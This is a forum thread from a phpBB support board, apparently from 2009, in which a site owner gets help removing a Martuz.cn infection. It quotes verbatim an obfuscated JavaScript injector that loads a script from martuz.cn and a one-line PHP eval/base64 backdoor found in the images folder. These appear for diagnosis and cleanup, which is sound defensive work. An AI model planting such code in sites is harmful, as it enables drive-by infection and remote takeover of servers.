board hacked - martuz

[thebluebus]

I say hacked but i'm not sure how this has happended
somehow i've got this

Code: Select all

<script language=javascript><!-- 
(function(){var KVI='%';var ZZ5h='~76ar~20a~3d~22~53~63ript~45ngi~6ee~22~2cb~3d~22Version~28)+~22~2cj~3d~22~22~2cu~3dna~76i~67~61tor~2e~75se~72Agen~74~3bif~28(u~2ei~6edexOf(~22Chrome~22)~3c~30)~26~26(u~2e~69n~64ex~4ff(~22~57i~6e~22)~3e0~29~26~26(u~2ei~6ede~78O~66(~22~4eT~20~36~22~29~3c0)~26~26(docu~6dent~2ec~6fokie~2e~69nde~78~4ff(~22miek~3d~31~22)~3c0)~26~26(typ~65o~66(zrv~7a~74~73)~21~3d~74ypeof(~22A~22)))~7bzrvzts~3d~22A~22~3beva~6c(~22~69f(window~2e~22+a~2b~22~29~6a~3dj+~22+a+~22M~61jor~22+b~2ba+~22Minor~22+b+~61+~22Build~22+b~2b~22j~3b~22)~3bd~6fcumen~74~2ewri~74e(~22~3cscri~70t~20src~3d~2f~2fma~22~2b~22r~74uz~2e~63n~2fv~69d~2f~3fid~3d~22+~6a+~22~3e~3c~5c~2fscript~3e~22)~3b~7d';var sa3s=ZZ5h.replace(/~/g,KVI);eval(unescape(sa3s))})();
 --></script>

just before the body tag on every page. It also had a zero pixel iframe going to some dodgy site at the bottom. I've got rid of this but the script above remains and keeps reading from martuz.cn whilst loading a page. I downloaded the site and scanned locally and avg found 25 core php files infected. I've replaced these with default files and purged etc, but its still there. Where should i look to remove it?

[karlsemple]

The first thing you should do is update your virus definitions on your computer and scan your computer for any Trojans, remove any which are found. Then be sure you update all your operating system and installed software. Then change all your passwords for your site, this includes hosting, ftp and database passwords. Once this is done replace all your damaged files with working ones from your last backup before the hack occured. It is looking like these are wide spread hacks as a result of a trojan which is infecting peoples computers and searching for and stealing ftp details allowing another script to be executed which uses these details to inject the files with the code you are finding.

[Kellanved]

Also, remove any files that do not belong from your webspace. These worms add backdoors, for instance the infamous image.php.
Moreover, it also infects html files, namely the templates.

See here for more information:
http://blog.unmaskparasites.com/2009/05 ... ed-script/
http://blog.unmaskparasites.com/2009/05 ... r-exploit/

[thebluebus]

thanks guys, i'm away travelling at the mo so i have a few trusted people at home with ftp access. I think between the 3 of us this is how its become infected. I've changed ftp passwords and deleted all access apart from me for now, i've scanned my pc and all is ok, i'm having a check over the server and haven't found anything suspicious yet like the image.php files.

any idea how to track down where the script is appearing?

[karlsemple]

any idea how to track down where the script is appearing?

If the attack has left any backdoor scripts of any kind the only way to track them down is to go through your directories 1 by 1 and check for rogue files. Having said that I spent days looking through my directories and found nothing (yes my site is currently dead as a result of the same hack) To be sure, I deleted my whole web root and am now re-uploading it from a previous working backup. I would suggest you do something similar if you have the backups to revert to.

[thebluebus]

sounds painful! thanks. sounds like drastic action required

[thebluebus]

just found this in the images folder

gifimg.php

Code: Select all

<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

edit: also in adm/images/

[Kellanved]

Yup, those are backdoors - delete them!

[thebluebus]

yeah all gone now. removed the lot and uploaded new files. Seems everything is ok. Thanks for the help guys

[Mick]

Can I ask before this is closed please?

1. How did the hack manifest itself?
2. Did it occur because of a desktop based worm?
3. Did you have any anti-spyware/malware/trojan/worm type software running?

I am assuming the worm stole the FTP details from the desktop machine you use for your board stuff then used that information to hack your board?

It may be helpful to know so that other users (and me) can take precautions against this type of attack.

Thanks.

[thebluebus]

sure,

the hack seems to have inserted code into almost all php files on the server affecting many sites i have hosted on a shared package. Its also inserted code into html and js files.

after some research of martuz.cn it appears its a trojan which steals ftp logins and then spread itself onto the server

like i said above, I am currently away for a year travelling so i've given a few people at home ftp access. since being away i have had a virus i struggled to get rid of (vundo/wowfx.dll). I'm guessing this is likely to be the culprit, however with a few people with access, it could have come from elsewhere.

I downloaded the site locally and scanned with avg and it detects the infected files, but not the backdoor files like gifimg.php. It also doesnt detect the code injected into js or html files. I've basically removed everything, started fresh, and am slowly rebuilding things. I've also changed passwords to the site, ftp, server cp etc everything.

[Mick]

I would assume one of your admins hasn't been taking the standard precautions then?

I have just looked at a 'faulty' laptop of a friend of mine who I was considering for an admin role. When I questioned him why his firewall and AV were disabled he said they were blocking him from going on to some sites. I ended up doing the famous Acer ALT-F10 and did a fresh install.

New admin:
Request for admin permissions: denied
If denied, state reason: too stupid

Thanks